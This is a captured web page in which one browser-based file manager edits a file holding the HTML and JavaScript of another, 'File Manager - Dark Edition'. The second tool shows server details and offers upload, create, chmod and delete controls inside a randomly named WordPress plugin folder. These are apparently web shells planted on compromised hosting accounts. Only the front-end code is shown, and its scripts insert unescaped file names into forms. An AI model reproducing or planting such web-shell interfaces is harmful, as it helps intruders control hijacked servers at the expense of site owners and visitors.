File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/citycentaur.com/index.php.1
Back
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File Manager - Dark Edition</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif; background: #0a0a0a; min-height: 100vh; padding: 20px; color: #e0e0e0; } .container { max-width: 1400px; margin: 0 auto; background: #1a1a1a; border-radius: 12px; box-shadow: 0 10px 40px rgba(0,0,0,0.8); overflow: hidden; border: 1px solid #2a2a2a; } .header { background: linear-gradient(135deg, #1e3c72 0%, #2a5298 100%); color: white; padding: 25px; border-bottom: 2px solid #3a3a3a; } .header h1 { font-size: 26px; margin-bottom: 10px; display: flex; align-items: center; gap: 10px; text-shadow: 2px 2px 4px rgba(0,0,0,0.5); } .sys-info { display: flex; gap: 20px; font-size: 13px; opacity: 0.9; flex-wrap: wrap; } .sys-info span { display: flex; align-items: center; gap: 5px; background: rgba(0,0,0,0.3); padding: 4px 10px; border-radius: 4px; } .nav { background: #252525; padding: 15px 25px; border-bottom: 1px solid #3a3a3a; } .path-bar { display: flex; gap: 10px; margin-bottom: 15px; } .path-bar input { flex: 1; padding: 10px 15px; background: #1a1a1a; border: 2px solid #3a3a3a; color: #e0e0e0; border-radius: 6px; font-size: 14px; transition: border-color 0.3s; } .path-bar input:focus { outline: none; border-color: #4a9eff; background: #222; } .btn { padding: 10px 20px; background: linear-gradient(135deg, #4a9eff 0%, #2a5298 100%); color: white; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: transform 0.2s, box-shadow 0.2s; } .btn:hover { transform: translateY(-2px); box-shadow: 0 5px 15px rgba(74, 158, 255, 0.4); } .btn-success { background: linear-gradient(135deg, #00b09b 0%, #96c93d 100%); } .btn-danger { background: linear-gradient(135deg, #ff416c 0%, #ff4b2b 100%); } .btn-small { padding: 5px 12px; font-size: 12px; } .tools { display: flex; gap: 15px; flex-wrap: wrap; } .tool-group { display: flex; align-items: center; gap: 10px; padding: 10px 15px; background: #1a1a1a; border-radius: 6px; border: 1px solid #3a3a3a; } .tool-group label { font-size: 13px; color: #a0a0a0; font-weight: 500; } .tool-group input[type="file"], .tool-group input[type="text"] { padding: 5px 10px; background: #252525; border: 1px solid #3a3a3a; color: #e0e0e0; border-radius: 4px; font-size: 13px; } .content { padding: 25px; background: #1a1a1a; } .notification { padding: 12px 20px; margin-bottom: 20px; border-radius: 6px; font-size: 14px; animation: slideIn 0.3s ease; } .notification.success { background: rgba(0, 255, 0, 0.1); color: #00ff00; border: 1px solid rgba(0, 255, 0, 0.3); } .notification.error { background: rgba(255, 65, 108, 0.1); color: #ff416c; border: 1px solid rgba(255, 65, 108, 0.3); } @keyframes slideIn { from { transform: translateY(-20px); opacity: 0; } to { transform: translateY(0); opacity: 1; } } .file-table { width: 100%; background: #252525; border-radius: 8px; overflow: hidden; box-shadow: 0 2px 10px rgba(0,0,0,0.5); border: 1px solid #3a3a3a; } .file-table thead { background: #1a1a1a; } .file-table th { padding: 15px; text-align: left; font-size: 13px; font-weight: 600; color: #4a9eff; text-transform: uppercase; letter-spacing: 0.5px; border-bottom: 2px solid #3a3a3a; } .file-table td { padding: 12px 15px; border-top: 1px solid #2a2a2a; font-size: 14px; color: #e0e0e0; } .file-table tbody tr { transition: background 0.2s; } .file-table tbody tr:hover { background: #2a2a2a; } .file-table tbody tr.folder-row { background: rgba(74, 158, 255, 0.05); border-left: 3px solid #4a9eff; } .file-table tbody tr.folder-row:hover { background: rgba(74, 158, 255, 0.1); } .file-table a { color: #4a9eff; text-decoration: none; font-weight: 500; display: inline-flex; align-items: center; gap: 8px; } .file-table a:hover { color: #6ab7ff; } .file-icon { width: 20px; height: 20px; display: inline-flex; align-items: center; justify-content: center; } .file-actions { display: flex; gap: 8px; flex-wrap: wrap; } .file-actions a { padding: 4px 10px; background: rgba(74, 158, 255, 0.2); color: #4a9eff; border: 1px solid rgba(74, 158, 255, 0.3); border-radius: 4px; font-size: 12px; transition: all 0.2s; } .file-actions a:hover { background: rgba(74, 158, 255, 0.3); border-color: #4a9eff; } .file-actions a.delete { background: rgba(255, 65, 108, 0.2); color: #ff416c; border-color: rgba(255, 65, 108, 0.3); } .file-actions a.delete:hover { background: rgba(255, 65, 108, 0.3); border-color: #ff416c; } /* Permission-based colors */ .perm-writable { color: #00ff00 !important; font-weight: 600; text-shadow: 0 0 5px rgba(0, 255, 0, 0.5); } .perm-readonly { color: #ff4444 !important; font-weight: 600; text-shadow: 0 0 5px rgba(255, 68, 68, 0.5); } .perm-indicator { display: inline-block; width: 8px; height: 8px; border-radius: 50%; margin-right: 5px; } .perm-indicator.writable { background: #00ff00; box-shadow: 0 0 5px #00ff00; animation: pulse-green 2s infinite; } .perm-indicator.readonly { background: #ff4444; box-shadow: 0 0 5px #ff4444; animation: pulse-red 2s infinite; } @keyframes pulse-green { 0%, 100% { opacity: 1; } 50% { opacity: 0.5; } } @keyframes pulse-red { 0%, 100% { opacity: 1; } 50% { opacity: 0.5; } } .edit-area { width: 100%; min-height: 400px; padding: 15px; background: #0a0a0a; border: 2px solid #3a3a3a; color: #00ff00; border-radius: 6px; font-family: 'Courier New', monospace; font-size: 14px; line-height: 1.5; resize: vertical; } .edit-area:focus { outline: none; border-color: #4a9eff; background: #111; } .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; animation: fadeIn 0.3s ease; } .modal.active { display: flex; align-items: center; justify-content: center; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } .modal-content { background: #252525; padding: 30px; border-radius: 12px; width: 90%; max-width: 500px; animation: slideUp 0.3s ease; border: 1px solid #3a3a3a; } @keyframes slideUp { from { transform: translateY(50px); opacity: 0; } to { transform: translateY(0); opacity: 1; } } .modal-header { margin-bottom: 20px; font-size: 20px; font-weight: 600; color: #4a9eff; } .modal-body input, .modal-body textarea { width: 100%; padding: 10px; margin-bottom: 15px; background: #1a1a1a; border: 2px solid #3a3a3a; color: #e0e0e0; border-radius: 6px; font-size: 14px; } .modal-body textarea { min-height: 150px; resize: vertical; } .modal-footer { display: flex; gap: 10px; justify-content: flex-end; } .empty { text-align: center; padding: 40px; color: #666; } .separator-row td { background: #1a1a1a; padding: 8px 15px !important; font-weight: 600; color: #4a9eff; border-top: 2px solid #3a3a3a !important; border-bottom: 2px solid #3a3a3a !important; text-transform: uppercase; letter-spacing: 1px; font-size: 12px; } @media (max-width: 768px) { .tools { flex-direction: column; } .file-table { font-size: 12px; } .file-actions { flex-direction: column; } .sys-info { font-size: 11px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>🌙 File Manager - Dark Edition</h1> <div class="sys-info"> <span><strong>PHP:</strong> 8.2.29</span> <span><strong>Server:</strong> nginx/1.24.0</span> <span><strong>OS:</strong> Linux 6.17.0-1007-oracle</span> <span><strong>User:</strong> www-data</span> </div> </div> <div class="nav"> <form method="get" class="path-bar"> <input type="text" name="p" value="/var/www/html/wordpress/public_html/wp-content/plugins/gwjcyru/" placeholder="Enter path..."> <button type="submit" class="btn">Navigate</button> </form> <div class="tools"> <form method="post" enctype="multipart/form-data" class="tool-group"> <label>Upload:</label> <input type="file" name="upload" required> <button type="submit" class="btn btn-small btn-success">Upload</button> </form> <div class="tool-group"> <button onclick="showNewFileModal()" class="btn btn-small">New File</button> <button onclick="showNewFolderModal()" class="btn btn-small">New Folder</button> </div> </div> </div> <div class="content"> <table class="file-table"> <thead> <tr> <th width="35%">Name</th> <th width="10%">Type</th> <th width="10%">Size</th> <th width="10%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <tr> <td colspan="6"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins"> <span class="file-icon">⬆️</span> Parent Directory </a> </td> </tr> <tr class="separator-row"><td colspan="6">📁 Folders</td></tr> <tr class="folder-row"> <td> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2Fadmin"> <span class="perm-indicator writable"></span> <span class="file-icon">📁</span> <span class="perm-writable"> admin </span> </a> </td> <td>Folder</td> <td>-</td> <td class="perm-writable"> rwxr-xr-x </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="#" onclick="renameItem('admin'); return false;">Rename</a> <a href="#" onclick="chmodItem('admin'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=admin" class="delete" onclick="return confirm('Delete this folder and all its contents?')">Delete</a> </div> </td> </tr> <tr class="folder-row"> <td> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2Fincludes"> <span class="perm-indicator writable"></span> <span class="file-icon">📁</span> <span class="perm-writable"> includes </span> </a> </td> <td>Folder</td> <td>-</td> <td class="perm-writable"> rwxr-xr-x </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="#" onclick="renameItem('includes'); return false;">Rename</a> <a href="#" onclick="chmodItem('includes'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=includes" class="delete" onclick="return confirm('Delete this folder and all its contents?')">Delete</a> </div> </td> </tr> <tr class="folder-row"> <td> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2Flanguages"> <span class="perm-indicator writable"></span> <span class="file-icon">📁</span> <span class="perm-writable"> languages </span> </a> </td> <td>Folder</td> <td>-</td> <td class="perm-writable"> rwxr-xr-x </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="#" onclick="renameItem('languages'); return false;">Rename</a> <a href="#" onclick="chmodItem('languages'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=languages" class="delete" onclick="return confirm('Delete this folder and all its contents?')">Delete</a> </div> </td> </tr> <tr class="separator-row"><td colspan="6">📄 Files</td></tr> <tr> <td> <span style="display: inline-flex; align-items: center; gap: 8px;"> <span class="perm-indicator writable"></span> <span class="file-icon">📄</span> <span class="perm-writable"> index.php </span> </span> </td> <td>PHP</td> <td>36.7 KB</td> <td class="perm-writable"> rw-r--r-- </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=edit&item=index.php">Edit</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=download&item=index.php">Download</a> <a href="#" onclick="renameItem('index.php'); return false;">Rename</a> <a href="#" onclick="chmodItem('index.php'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=index.php" class="delete" onclick="return confirm('Delete this file?')">Delete</a> </div> </td> </tr> <tr> <td> <span style="display: inline-flex; align-items: center; gap: 8px;"> <span class="perm-indicator writable"></span> <span class="file-icon">📄</span> <span class="perm-writable"> LICENSE.txt </span> </span> </td> <td>TXT</td> <td>18 KB</td> <td class="perm-writable"> rw-r--r-- </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=edit&item=LICENSE.txt">Edit</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=download&item=LICENSE.txt">Download</a> <a href="#" onclick="renameItem('LICENSE.txt'); return false;">Rename</a> <a href="#" onclick="chmodItem('LICENSE.txt'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=LICENSE.txt" class="delete" onclick="return confirm('Delete this file?')">Delete</a> </div> </td> </tr> <tr> <td> <span style="display: inline-flex; align-items: center; gap: 8px;"> <span class="perm-indicator writable"></span> <span class="file-icon">📄</span> <span class="perm-writable"> protect-uploads.php </span> </span> </td> <td>PHP</td> <td>1.5 KB</td> <td class="perm-writable"> rw-r--r-- </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=edit&item=protect-uploads.php">Edit</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=download&item=protect-uploads.php">Download</a> <a href="#" onclick="renameItem('protect-uploads.php'); return false;">Rename</a> <a href="#" onclick="chmodItem('protect-uploads.php'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=protect-uploads.php" class="delete" onclick="return confirm('Delete this file?')">Delete</a> </div> </td> </tr> <tr> <td> <span style="display: inline-flex; align-items: center; gap: 8px;"> <span class="perm-indicator writable"></span> <span class="file-icon">📄</span> <span class="perm-writable"> readme.txt </span> </span> </td> <td>TXT</td> <td>2.4 KB</td> <td class="perm-writable"> rw-r--r-- </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=edit&item=readme.txt">Edit</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=download&item=readme.txt">Download</a> <a href="#" onclick="renameItem('readme.txt'); return false;">Rename</a> <a href="#" onclick="chmodItem('readme.txt'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=readme.txt" class="delete" onclick="return confirm('Delete this file?')">Delete</a> </div> </td> </tr> <tr> <td> <span style="display: inline-flex; align-items: center; gap: 8px;"> <span class="perm-indicator writable"></span> <span class="file-icon">📄</span> <span class="perm-writable"> uninstall.php </span> </span> </td> <td>PHP</td> <td>1.3 KB</td> <td class="perm-writable"> rw-r--r-- </td> <td>2026-03-23 07:11</td> <td> <div class="file-actions"> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=edit&item=uninstall.php">Edit</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=download&item=uninstall.php">Download</a> <a href="#" onclick="renameItem('uninstall.php'); return false;">Rename</a> <a href="#" onclick="chmodItem('uninstall.php'); return false;">Chmod</a> <a href="?p=%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fpublic_html%2Fwp-content%2Fplugins%2Fgwjcyru%2F&do=delete&item=uninstall.php" class="delete" onclick="return confirm('Delete this file?')">Delete</a> </div> </td> </tr> </tbody> </table> </div> </div> <!-- New File Modal --> <div id="newFileModal" class="modal"> <div class="modal-content"> <div class="modal-header">Create New File</div> <form method="post"> <div class="modal-body"> <input type="text" name="newfile" placeholder="Filename (e.g., index.php)" required> <textarea name="filecontent" placeholder="File content (optional)"></textarea> </div> <div class="modal-footer"> <button type="submit" class="btn btn-success">Create</button> <button type="button" class="btn btn-danger" onclick="closeModal('newFileModal')">Cancel</button> </div> </form> </div> </div> <!-- New Folder Modal --> <div id="newFolderModal" class="modal"> <div class="modal-content"> <div class="modal-header">Create New Folder</div> <form method="post"> <div class="modal-body"> <input type="text" name="newfolder" placeholder="Folder name" required> </div> <div class="modal-footer"> <button type="submit" class="btn btn-success">Create</button> <button type="button" class="btn btn-danger" onclick="closeModal('newFolderModal')">Cancel</button> </div> </form> </div> </div> <script> // Modal functions function showNewFileModal() { document.getElementById('newFileModal').classList.add('active'); } function showNewFolderModal() { document.getElementById('newFolderModal').classList.add('active'); } function closeModal(id) { document.getElementById(id).classList.remove('active'); } // Rename function function renameItem(oldName) { var newName = prompt('Enter new name:', oldName); if(newName && newName !== oldName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="oldname" value="' + oldName + '">' + '<input type="hidden" name="newname" value="' + newName + '">'; document.body.appendChild(form); form.submit(); } } // Chmod function function chmodItem(item) { var mode = prompt('Enter new permissions (e.g., 755):', '755'); if(mode) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="chmod_item" value="' + item + '">' + '<input type="hidden" name="chmod_value" value="' + mode + '">'; document.body.appendChild(form); form.submit(); } } // Auto-hide notifications setTimeout(function() { var notifications = document.querySelectorAll('.notification'); notifications.forEach(function(n) { n.style.opacity = '0'; setTimeout(function() { n.style.display = 'none'; }, 300); }); }, 3000); // Keyboard shortcuts document.addEventListener('keydown', function(e) { if(e.ctrlKey && e.key === 'n') { e.preventDefault(); showNewFileModal(); } if(e.ctrlKey && e.shiftKey && e.key === 'N') { e.preventDefault(); showNewFolderModal(); } if(e.key === 'Escape') { document.querySelectorAll('.modal.active').forEach(function(m) { m.classList.remove('active'); }); } }); // Click outside modal to close document.querySelectorAll('.modal').forEach(function(modal) { modal.addEventListener('click', function(e) { if(e.target === modal) { modal.classList.remove('active'); } }); }); </script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings